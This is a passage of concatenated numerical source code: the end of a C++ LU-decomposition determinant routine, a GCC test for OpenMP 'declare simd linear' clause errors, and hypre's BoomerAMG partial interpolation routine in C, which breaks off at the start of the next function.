    if (mat_size != static_cast<int>(A[0].size()))
{
// check matrix is a square matrix
std::cerr << "Not a square matrix!\n";
return -1;
}
// regularize each row
    for (int row = 0; row < mat_size; row++)
{
// Upper triangular matrix
#ifdef _OPENMP
#pragma omp for
#endif
        for (int col = row; col < mat_size; col++)
{
// Summation of L[i,j] * U[j,k]
double lu_sum = 0.;
            for (int j = 0; j < row; j++)
{
lu_sum += L[0][row][j] * U[0][j][col];
}
// Evaluate U[i,k]
U[0][row][col] = A[row][col] - lu_sum;
}
// Lower triangular matrix
#ifdef _OPENMP
#pragma omp for
#endif
        for (int col = row; col < mat_size; col++)
{
if (row == col)
{
L[0][row][col] = 1.;
continue;
}
// Summation of L[i,j] * U[j,k]
double lu_sum = 0.;
            for (int j = 0; j < row; j++)
{
lu_sum += L[0][col][j] * U[0][j][row];
}
            // Evaluate L[k,i]
L[0][col][row] = (A[col][row] - lu_sum) / U[0][row][row];
}
}
return 0;
}
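/* The loops above implement the Doolittle recurrences (for reference):
 *   U[i][k] = A[i][k] - sum_{j<i} L[i][j] * U[j][k]                 (k >= i)
 *   L[k][i] = (A[k][i] - sum_{j<i} L[k][j] * U[j][i]) / U[i][i],  L[i][i] = 1
 * so L is unit lower triangular and U is upper triangular.
 */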
/**
* Compute determinant of an NxN square matrix using LU decomposition.
* Using LU decomposition, the determinant is given by the product of diagonal
* elements of matrices L and U.
*
* @tparam T datatype of input matrix - int, unsigned int, double, etc
* @param A input square matrix
* @return determinant of matrix A
*/
template <typename T>
double determinant_lu(const matrix<T> &A)
{
matrix<double> L(A.size(), std::valarray<double>(A.size()));
matrix<double> U(A.size(), std::valarray<double>(A.size()));
if (lu_decomposition(A, &L, &U) < 0)
{
return 0;
}
    double result = 1.0;
for (size_t i = 0; i < A.size(); i++)
{
result *= L[i][i] * U[i][i];
}
return result;
}
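/* Usage sketch (illustrative, not part of the original header): for
 * A = {{4, 3}, {6, 3}}, Doolittle LU gives U = {{4, 3}, {0, -1.5}} and a
 * unit-diagonal L, so the determinant is 4 * (-1.5) = -6:
 *
 *   matrix<int> A = {{4, 3}, {6, 3}};
 *   double det = determinant_lu(A);  // -6
 */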
|
declare-simd-4.c | /* { dg-do compile } */
/* { dg-options "-fopenmp-simd" } */
#pragma omp declare simd linear(a:1 + b) uniform(b) /* { dg-error ".linear. clause step .b \\+ 1. is neither constant nor a parameter" } */
int f1 (int a, int b);
#pragma omp declare simd linear(a:b + 1) uniform(b) /* { dg-error ".linear. clause step .b \\+ 1. is neither constant nor a parameter" } */
int f2 (int a, int b);
#pragma omp declare simd linear(a:2 * b) uniform(b) /* { dg-error ".linear. clause step .b \\* 2. is neither constant nor a parameter" } */
int f3 (int a, int b);
#pragma omp declare simd linear(a:b) /* { dg-error ".linear. clause step is a parameter .b. not specified in .uniform. clause" } */
int f4 (int a, int b);
#pragma omp declare simd linear(a:b) linear(b:1) /* { dg-error ".linear. clause step is a parameter .b. not specified in .uniform. clause" } */
int f5 (int a, int b);
#pragma omp declare simd linear(a:5 + 2 * 3)
int f6 (int a, int b);
const int c = 5;
#pragma omp declare simd linear(a:c) /* { dg-error ".linear. clause step .c. is neither constant nor a parameter" } */
int f7 (int a, int b);
#pragma omp declare simd linear(a:2 * c + 1) /* { dg-error ".linear. clause step .\[^\n\r]*. is neither constant nor a parameter" } */
int f8 (int a, int b);
#pragma omp declare simd linear(a:0.5) /* { dg-error ".linear. clause step expression must be integral" } */
int f9 (int a, int b);
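/* For contrast (illustrative addition, not part of the original test): a
   step that is itself a uniform parameter is accepted, e.g.
   #pragma omp declare simd linear(a:b) uniform(b)
   int f10 (int a, int b);  */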
|
partial.c | /******************************************************************************
* Copyright 1998-2019 Lawrence Livermore National Security, LLC and other
* HYPRE Project Developers. See the top-level COPYRIGHT file for details.
*
* SPDX-License-Identifier: (Apache-2.0 OR MIT)
******************************************************************************/
#include "_hypre_parcsr_ls.h"
#include "aux_interp.h"
/*---------------------------------------------------------------------------
* hypre_BoomerAMGBuildPartialExtPIInterp
* Comment:
*--------------------------------------------------------------------------*/
HYPRE_Int
hypre_BoomerAMGBuildPartialExtPIInterp(hypre_ParCSRMatrix *A, HYPRE_Int *CF_marker,
hypre_ParCSRMatrix *S, HYPRE_BigInt *num_cpts_global,
HYPRE_BigInt *num_old_cpts_global,
HYPRE_Int num_functions, HYPRE_Int *dof_func, HYPRE_Int debug_flag,
HYPRE_Real trunc_factor, HYPRE_Int max_elmts,
hypre_ParCSRMatrix **P_ptr)
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PARTIAL_INTERP] -= hypre_MPI_Wtime();
#endif
/* Communication Variables */
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
HYPRE_Int my_id, num_procs;
/* Variables to store input variables */
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
HYPRE_Int *A_diag_i = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_j = hypre_CSRMatrixJ(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int *A_offd_i = hypre_CSRMatrixI(A_offd);
HYPRE_Int *A_offd_j = hypre_CSRMatrixJ(A_offd);
/*HYPRE_Int num_cols_A_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_Int *col_map_offd = hypre_ParCSRMatrixColMapOffd(A);*/
HYPRE_Int n_fine = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_1 = hypre_ParCSRMatrixFirstRowIndex(A);
HYPRE_Int local_numrows = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_n = col_1 + (HYPRE_BigInt)local_numrows;
HYPRE_BigInt total_global_cpts, my_first_cpt;
/* Variables to store strong connection matrix info */
hypre_CSRMatrix *S_diag = hypre_ParCSRMatrixDiag(S);
HYPRE_Int *S_diag_i = hypre_CSRMatrixI(S_diag);
HYPRE_Int *S_diag_j = hypre_CSRMatrixJ(S_diag);
hypre_CSRMatrix *S_offd = hypre_ParCSRMatrixOffd(S);
HYPRE_Int *S_offd_i = hypre_CSRMatrixI(S_offd);
HYPRE_Int *S_offd_j = hypre_CSRMatrixJ(S_offd);
/* Interpolation matrix P */
hypre_ParCSRMatrix *P;
hypre_CSRMatrix *P_diag;
hypre_CSRMatrix *P_offd;
HYPRE_Real *P_diag_data = NULL;
HYPRE_Int *P_diag_i, *P_diag_j = NULL;
HYPRE_Real *P_offd_data = NULL;
HYPRE_Int *P_offd_i, *P_offd_j = NULL;
/*HYPRE_Int *col_map_offd_P = NULL;*/
HYPRE_Int P_diag_size;
HYPRE_Int P_offd_size;
/*HYPRE_Int *P_marker = NULL;
HYPRE_Int *P_marker_offd = NULL;*/
HYPRE_Int *CF_marker_offd = NULL;
HYPRE_Int *tmp_CF_marker_offd = NULL;
HYPRE_Int *dof_func_offd = NULL;
   /* Full row information for columns of A that are off diag */
hypre_CSRMatrix *A_ext;
HYPRE_Real *A_ext_data;
HYPRE_Int *A_ext_i;
HYPRE_BigInt *A_ext_j;
HYPRE_Int *fine_to_coarse = NULL;
HYPRE_BigInt *fine_to_coarse_offd = NULL;
HYPRE_Int *old_coarse_to_fine = NULL;
HYPRE_Int full_off_procNodes;
hypre_CSRMatrix *Sop;
HYPRE_Int *Sop_i;
HYPRE_BigInt *Sop_j;
HYPRE_Int sgn;
/* Variables to keep count of interpolatory points */
/*HYPRE_Int jj_counter, jj_counter_offd;
HYPRE_Int jj_begin_row, jj_end_row;
HYPRE_Int jj_begin_row_offd = 0;
HYPRE_Int jj_end_row_offd = 0;
HYPRE_Int coarse_counter, coarse_counter_offd; */
HYPRE_Int n_coarse_old;
HYPRE_BigInt total_old_global_cpts;
/* Interpolation weight variables */
HYPRE_Real sum, diagonal, distribute;
/*HYPRE_Int strong_f_marker = -2;*/
/* Loop variables */
/*HYPRE_Int index;*/
HYPRE_Int cnt, old_cnt;
HYPRE_Int start_indexing = 0;
HYPRE_Int i;
/*HYPRE_Int i, ii, i1, i2, j, jj, kk, k1, jj1;*/
/* Definitions */
HYPRE_Real zero = 0.0;
HYPRE_Real one = 1.0;
HYPRE_Real wall_time;
HYPRE_Int max_num_threads;
HYPRE_Int *P_diag_array = NULL;
HYPRE_Int *P_offd_array = NULL;
hypre_ParCSRCommPkg *extend_comm_pkg = NULL;
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
/* BEGIN */
hypre_MPI_Comm_size(comm, &num_procs);
hypre_MPI_Comm_rank(comm, &my_id);
max_num_threads = hypre_NumThreads();
my_first_cpt = num_cpts_global[0];
/*my_first_old_cpt = num_old_cpts_global[0];*/
n_coarse_old = (HYPRE_Int)(num_old_cpts_global[1] - num_old_cpts_global[0]);
/*n_coarse = num_cpts_global[1] - num_cpts_global[0];*/
if (my_id == (num_procs - 1))
{
total_global_cpts = num_cpts_global[1];
total_old_global_cpts = num_old_cpts_global[1];
}
hypre_MPI_Bcast(&total_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
hypre_MPI_Bcast(&total_old_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
if (!comm_pkg)
{
hypre_MatvecCommPkgCreate(A);
comm_pkg = hypre_ParCSRMatrixCommPkg(A);
}
   /* Set up off processor information (specifically for neighbors of
    * neighbors) */
full_off_procNodes = 0;
if (num_procs > 1)
{
if (hypre_exchange_interp_data(
&CF_marker_offd, &dof_func_offd, &A_ext, &full_off_procNodes, &Sop, &extend_comm_pkg,
A, CF_marker, S, num_functions, dof_func, 1))
{
#ifdef HYPRE_PROFILE
         hypre_profile_times[HYPRE_TIMER_ID_PARTIAL_INTERP] += hypre_MPI_Wtime();
#endif
return hypre_error_flag;
}
A_ext_i = hypre_CSRMatrixI(A_ext);
A_ext_j = hypre_CSRMatrixBigJ(A_ext);
A_ext_data = hypre_CSRMatrixData(A_ext);
Sop_i = hypre_CSRMatrixI(Sop);
Sop_j = hypre_CSRMatrixBigJ(Sop);
}
/*-----------------------------------------------------------------------
* First Pass: Determine size of P and fill in fine_to_coarse mapping.
*-----------------------------------------------------------------------*/
/*-----------------------------------------------------------------------
    * Initialize counters and allocate mapping vector.
*-----------------------------------------------------------------------*/
P_diag_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
P_offd_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
if (n_fine)
{
old_coarse_to_fine = hypre_CTAlloc(HYPRE_Int, n_coarse_old, HYPRE_MEMORY_HOST);
fine_to_coarse = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
/*P_marker = hypre_CTAlloc(HYPRE_Int, n_fine); */
}
if (full_off_procNodes)
{
/*P_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes);*/
fine_to_coarse_offd = hypre_CTAlloc(HYPRE_BigInt, full_off_procNodes, HYPRE_MEMORY_HOST);
tmp_CF_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
}
/*hypre_initialize_vecs(n_fine, full_off_procNodes, fine_to_coarse,
fine_to_coarse_offd, P_marker, P_marker_offd,
tmp_CF_marker_offd);*/
for (i = 0; i < full_off_procNodes; i++)
{
fine_to_coarse_offd[i] = -1;
tmp_CF_marker_offd[i] = -1;
}
cnt = 0;
old_cnt = 0;
for (i = 0; i < n_fine; i++)
{
fine_to_coarse[i] = -1;
if (CF_marker[i] == 1)
{
fine_to_coarse[i] = cnt++;
old_coarse_to_fine[old_cnt++] = i;
}
else if (CF_marker[i] == -2)
{
old_coarse_to_fine[old_cnt++] = i;
}
}
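   /* Rows of P are indexed by the old coarse grid: both current C points
    * (CF_marker == 1, which also receive a new coarse index) and newly
    * created F points (CF_marker == -2) are old coarse points. */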
P_diag_array = hypre_CTAlloc(HYPRE_Int, max_num_threads + 1, HYPRE_MEMORY_HOST);
P_offd_array = hypre_CTAlloc(HYPRE_Int, max_num_threads + 1, HYPRE_MEMORY_HOST);
/*-----------------------------------------------------------------------
* Loop over fine grid.
*-----------------------------------------------------------------------*/
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel private(i, diagonal, distribute, sgn, sum)
#endif
{
HYPRE_Int ii, jj_counter, jj_counter_offd, jj, kk, i1, i2, k1, jj1;
HYPRE_BigInt big_k1;
HYPRE_Int loc_col, jj_begin_row, jj_begin_row_offd;
HYPRE_Int jj_end_row, jj_end_row_offd, strong_f_marker;
HYPRE_Int size, rest, ne, ns;
HYPRE_Int num_threads, my_thread_num;
HYPRE_Int *P_marker = NULL;
HYPRE_Int *P_marker_offd = NULL;
strong_f_marker = -2;
num_threads = hypre_NumActiveThreads();
my_thread_num = hypre_GetThreadNum();
size = n_coarse_old / num_threads;
rest = n_coarse_old - size * num_threads;
if (my_thread_num < rest)
{
ns = my_thread_num * (size + 1);
ne = (my_thread_num + 1) * (size + 1);
}
else
{
ns = my_thread_num * size + rest;
ne = (my_thread_num + 1) * size + rest;
}
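      /* Static row partition: e.g. n_coarse_old = 10 on 3 threads gives
       * size = 3, rest = 1, hence ranges [0,4), [4,7) and [7,10). */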
if (n_fine) { P_marker = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST); }
for (ii = 0; ii < n_fine; ii++)
{
P_marker[ii] = -1;
}
if (full_off_procNodes) { P_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST); }
for (ii = 0; ii < full_off_procNodes; ii++)
{
P_marker_offd[ii] = -1;
}
/*coarse_counter = 0;
coarse_counter_offd = 0;*/
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
for (ii = ns; ii < ne; ii++)
{
jj_begin_row = jj_counter;
jj_begin_row_offd = jj_counter_offd;
/*P_diag_i[ii] = jj_counter;
if (num_procs > 1)
P_offd_i[ii] = jj_counter_offd;*/
i = old_coarse_to_fine[ii];
if (CF_marker[i] > 0)
{
jj_counter++;
/*coarse_counter++;*/
}
/*--------------------------------------------------------------------
* If i is an F-point, interpolation is from the C-points that
       * strongly influence i, or C-points that strongly influence F-points
* that strongly influence i.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
if (CF_marker[i1] > 0)
{
/* i1 is a C point */
if (P_marker[i1] < jj_begin_row)
{
P_marker[i1] = jj_counter;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
               /* i1 is an F point, loop through its strong neighbors */
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] > 0)
{
if (P_marker[k1] < jj_begin_row)
{
P_marker[k1] = jj_counter;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] > 0)
{
if (P_marker_offd[k1] < jj_begin_row_offd)
{
tmp_CF_marker_offd[k1] = 1;
P_marker_offd[k1] = jj_counter_offd;
jj_counter_offd++;
}
}
}
}
}
}
/* Look at off diag strong connections of i */
if (num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if (CF_marker_offd[i1] > 0)
{
if (P_marker_offd[i1] < jj_begin_row_offd)
{
tmp_CF_marker_offd[i1] = 1;
P_marker_offd[i1] = jj_counter_offd;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
                  /* F point; look at neighbors of i1. Sop contains global col
                   * numbers and entries that could be in S_diag or S_offd or
                   * neither; off-processor columns arrive pre-encoded as
                   * -(local index) - 1, hence the decoding below. */
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* In S_diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] < jj_begin_row)
{
P_marker[loc_col] = jj_counter;
jj_counter++;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] < jj_begin_row_offd)
{
P_marker_offd[loc_col] = jj_counter_offd;
tmp_CF_marker_offd[loc_col] = 1;
jj_counter_offd++;
}
}
}
}
}
}
}
P_diag_array[my_thread_num] = jj_counter;
P_offd_array[my_thread_num] = jj_counter_offd;
}
#ifdef HYPRE_USING_OPENMP
#pragma omp barrier
#endif
if (my_thread_num == 0)
{
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d determine structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
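         /* Prefix-sum the per-thread counts so every thread gets a disjoint
          * write offset into P_diag_j / P_offd_j in the second pass. */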
for (i = 0; i < max_num_threads; i++)
{
P_diag_array[i + 1] += P_diag_array[i];
P_offd_array[i + 1] += P_offd_array[i];
}
P_diag_size = P_diag_array[max_num_threads];
P_offd_size = P_offd_array[max_num_threads];
if (P_diag_size)
{
P_diag_j = hypre_CTAlloc(HYPRE_Int, P_diag_size, HYPRE_MEMORY_HOST);
P_diag_data = hypre_CTAlloc(HYPRE_Real, P_diag_size, HYPRE_MEMORY_HOST);
}
if (P_offd_size)
{
P_offd_j = hypre_CTAlloc(HYPRE_Int, P_offd_size, HYPRE_MEMORY_HOST);
P_offd_data = hypre_CTAlloc(HYPRE_Real, P_offd_size, HYPRE_MEMORY_HOST);
}
P_diag_i[n_coarse_old] = P_diag_size;
P_offd_i[n_coarse_old] = P_offd_size;
/* Fine to coarse mapping */
if (num_procs > 1)
{
hypre_big_insert_new_nodes(comm_pkg, extend_comm_pkg, fine_to_coarse,
full_off_procNodes, my_first_cpt,
fine_to_coarse_offd);
}
}
for (i = 0; i < n_fine; i++)
{
P_marker[i] = -1;
}
for (i = 0; i < full_off_procNodes; i++)
{
P_marker_offd[i] = -1;
}
#ifdef HYPRE_USING_OPENMP
#pragma omp barrier
#endif
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
if (my_thread_num)
{
jj_counter = P_diag_array[my_thread_num - 1];
jj_counter_offd = P_offd_array[my_thread_num - 1];
}
/*-----------------------------------------------------------------------
* Loop over fine grid points.
*-----------------------------------------------------------------------*/
for (ii = ns; ii < ne; ii++)
{
jj_begin_row = jj_counter;
jj_begin_row_offd = jj_counter_offd;
P_diag_i[ii] = jj_counter;
P_offd_i[ii] = jj_counter_offd;
i = old_coarse_to_fine[ii];
/*--------------------------------------------------------------------
* If i is a c-point, interpolation is the identity.
*--------------------------------------------------------------------*/
if (CF_marker[i] > 0)
{
P_diag_j[jj_counter] = fine_to_coarse[i];
P_diag_data[jj_counter] = one;
jj_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, build interpolation.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
strong_f_marker--;
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
/*--------------------------------------------------------------
* If neighbor i1 is a C-point, set column number in P_diag_j
* and initialize interpolation weight to zero.
*--------------------------------------------------------------*/
if (CF_marker[i1] >= 0)
{
if (P_marker[i1] < jj_begin_row)
{
P_marker[i1] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[i1];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
P_marker[i1] = strong_f_marker;
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] >= 0)
{
if (P_marker[k1] < jj_begin_row)
{
P_marker[k1] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[k1];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] >= 0)
{
if (P_marker_offd[k1] < jj_begin_row_offd)
{
P_marker_offd[k1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = k1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
if ( num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if ( CF_marker_offd[i1] >= 0)
{
if (P_marker_offd[i1] < jj_begin_row_offd)
{
P_marker_offd[i1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = i1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
P_marker_offd[i1] = strong_f_marker;
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
/* Find local col number */
if (big_k1 >= col_1 && big_k1 < col_n)
{
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] < jj_begin_row)
{
P_marker[loc_col] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[loc_col];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] < jj_begin_row_offd)
{
P_marker_offd[loc_col] = jj_counter_offd;
P_offd_j[jj_counter_offd] = loc_col;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
jj_end_row = jj_counter;
jj_end_row_offd = jj_counter_offd;
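         /* hypre's ParCSR diag block stores the diagonal entry first in each
          * local row, so A_diag_data[A_diag_i[i]] is a_(i,i). */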
diagonal = A_diag_data[A_diag_i[i]];
for (jj = A_diag_i[i] + 1; jj < A_diag_i[i + 1]; jj++)
{
/* i1 is a c-point and strongly influences i, accumulate
* a_(i,i1) into interpolation weight */
i1 = A_diag_j[jj];
if (P_marker[i1] >= jj_begin_row)
{
P_diag_data[P_marker[i1]] += A_diag_data[jj];
}
else if (P_marker[i1] == strong_f_marker)
{
sum = zero;
sgn = 1;
if (A_diag_data[A_diag_i[i1]] < 0) { sgn = -1; }
/* Loop over row of A for point i1 and calculate the sum
             * of the connections to c-points that strongly influence i. */
for (jj1 = A_diag_i[i1] + 1; jj1 < A_diag_i[i1 + 1]; jj1++)
{
i2 = A_diag_j[jj1];
if ((P_marker[i2] >= jj_begin_row || i2 == i) && (sgn * A_diag_data[jj1]) < 0)
{
sum += A_diag_data[jj1];
}
}
if (num_procs > 1)
{
for (jj1 = A_offd_i[i1]; jj1 < A_offd_i[i1 + 1]; jj1++)
{
i2 = A_offd_j[jj1];
if (P_marker_offd[i2] >= jj_begin_row_offd &&
(sgn * A_offd_data[jj1]) < 0)
{
sum += A_offd_data[jj1];
}
}
}
if (sum != 0)
{
distribute = A_diag_data[jj] / sum;
/* Loop over row of A for point i1 and do the distribution */
for (jj1 = A_diag_i[i1] + 1; jj1 < A_diag_i[i1 + 1]; jj1++)
{
i2 = A_diag_j[jj1];
if (P_marker[i2] >= jj_begin_row && (sgn * A_diag_data[jj1]) < 0)
P_diag_data[P_marker[i2]] +=
distribute * A_diag_data[jj1];
if (i2 == i && (sgn * A_diag_data[jj1]) < 0)
{
diagonal += distribute * A_diag_data[jj1];
}
}
if (num_procs > 1)
{
for (jj1 = A_offd_i[i1]; jj1 < A_offd_i[i1 + 1]; jj1++)
{
i2 = A_offd_j[jj1];
if (P_marker_offd[i2] >= jj_begin_row_offd &&
(sgn * A_offd_data[jj1]) < 0)
P_offd_data[P_marker_offd[i2]] +=
distribute * A_offd_data[jj1];
}
}
}
else
{
diagonal += A_diag_data[jj];
}
}
/* neighbor i1 weakly influences i, accumulate a_(i,i1) into
* diagonal */
else if (CF_marker[i1] != -3)
{
if (num_functions == 1 || dof_func[i] == dof_func[i1])
{
diagonal += A_diag_data[jj];
}
}
}
if (num_procs > 1)
{
for (jj = A_offd_i[i]; jj < A_offd_i[i + 1]; jj++)
{
i1 = A_offd_j[jj];
if (P_marker_offd[i1] >= jj_begin_row_offd)
{
P_offd_data[P_marker_offd[i1]] += A_offd_data[jj];
}
else if (P_marker_offd[i1] == strong_f_marker)
{
sum = zero;
for (jj1 = A_ext_i[i1]; jj1 < A_ext_i[i1 + 1]; jj1++)
{
big_k1 = A_ext_j[jj1];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] >= jj_begin_row || loc_col == i)
{
sum += A_ext_data[jj1];
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] >= jj_begin_row_offd)
{
sum += A_ext_data[jj1];
}
}
}
if (sum != 0)
{
distribute = A_offd_data[jj] / sum;
for (jj1 = A_ext_i[i1]; jj1 < A_ext_i[i1 + 1]; jj1++)
{
big_k1 = A_ext_j[jj1];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] >= jj_begin_row)
P_diag_data[P_marker[loc_col]] += distribute *
A_ext_data[jj1];
if (loc_col == i)
{
diagonal += distribute * A_ext_data[jj1];
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] >= jj_begin_row_offd)
P_offd_data[P_marker_offd[loc_col]] += distribute *
A_ext_data[jj1];
}
}
}
else
{
diagonal += A_offd_data[jj];
}
}
else if (CF_marker_offd[i1] != -3)
{
if (num_functions == 1 || dof_func[i] == dof_func_offd[i1])
{
diagonal += A_offd_data[jj];
}
}
}
}
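         /* Final weights follow the classical formula
          * w_(i,j) = -(accumulated a~_(i,j)) / a~_(i,i), where a~ includes the
          * strong-F contributions distributed above. */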
if (diagonal)
{
for (jj = jj_begin_row; jj < jj_end_row; jj++)
{
P_diag_data[jj] /= -diagonal;
}
for (jj = jj_begin_row_offd; jj < jj_end_row_offd; jj++)
{
P_offd_data[jj] /= -diagonal;
}
}
}
strong_f_marker--;
}
hypre_TFree(P_marker, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker_offd, HYPRE_MEMORY_HOST);
} /* end parallel region */
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d fill structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
P = hypre_ParCSRMatrixCreate(comm,
total_old_global_cpts,
total_global_cpts,
num_old_cpts_global,
num_cpts_global,
0,
P_diag_i[n_coarse_old],
P_offd_i[n_coarse_old]);
P_diag = hypre_ParCSRMatrixDiag(P);
hypre_CSRMatrixData(P_diag) = P_diag_data;
hypre_CSRMatrixI(P_diag) = P_diag_i;
hypre_CSRMatrixJ(P_diag) = P_diag_j;
P_offd = hypre_ParCSRMatrixOffd(P);
hypre_CSRMatrixData(P_offd) = P_offd_data;
hypre_CSRMatrixI(P_offd) = P_offd_i;
hypre_CSRMatrixJ(P_offd) = P_offd_j;
hypre_CSRMatrixMemoryLocation(P_diag) = HYPRE_MEMORY_HOST;
hypre_CSRMatrixMemoryLocation(P_offd) = HYPRE_MEMORY_HOST;
/* Compress P, removing coefficients smaller than trunc_factor * Max */
if (trunc_factor != 0.0 || max_elmts > 0)
{
hypre_BoomerAMGInterpTruncation(P, trunc_factor, max_elmts);
P_diag_data = hypre_CSRMatrixData(P_diag);
P_diag_i = hypre_CSRMatrixI(P_diag);
P_diag_j = hypre_CSRMatrixJ(P_diag);
P_offd_data = hypre_CSRMatrixData(P_offd);
P_offd_i = hypre_CSRMatrixI(P_offd);
P_offd_j = hypre_CSRMatrixJ(P_offd);
P_diag_size = P_diag_i[n_coarse_old];
P_offd_size = P_offd_i[n_coarse_old];
}
/* This builds col_map, col_map should be monotone increasing and contain
* global numbers. */
if (P_offd_size)
{
hypre_build_interp_colmap(P, full_off_procNodes, tmp_CF_marker_offd, fine_to_coarse_offd);
}
hypre_MatvecCommPkgCreate(P);
for (i = 0; i < n_fine; i++)
if (CF_marker[i] < -1) { CF_marker[i] = -1; }
*P_ptr = P;
/* Deallocate memory */
hypre_TFree(fine_to_coarse, HYPRE_MEMORY_HOST);
hypre_TFree(old_coarse_to_fine, HYPRE_MEMORY_HOST);
hypre_TFree(P_diag_array, HYPRE_MEMORY_HOST);
hypre_TFree(P_offd_array, HYPRE_MEMORY_HOST);
if (num_procs > 1)
{
hypre_CSRMatrixDestroy(Sop);
hypre_CSRMatrixDestroy(A_ext);
hypre_TFree(fine_to_coarse_offd, HYPRE_MEMORY_HOST);
hypre_TFree(CF_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(tmp_CF_marker_offd, HYPRE_MEMORY_HOST);
if (num_functions > 1)
{
hypre_TFree(dof_func_offd, HYPRE_MEMORY_HOST);
}
hypre_MatvecCommPkgDestroy(extend_comm_pkg);
}
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PARTIAL_INTERP] += hypre_MPI_Wtime();
#endif
return hypre_error_flag;
}
/*---------------------------------------------------------------------------
* hypre_BoomerAMGBuildPartialStdInterp
 * Comment: The interpolation weighting can be changed with the sep_weight
 *          variable: when sep_weight == 1, negative and positive
 *          off-diagonal contributions are distributed separately in the
 *          weight formula; otherwise a single combined sum is used.
*--------------------------------------------------------------------------*/
HYPRE_Int
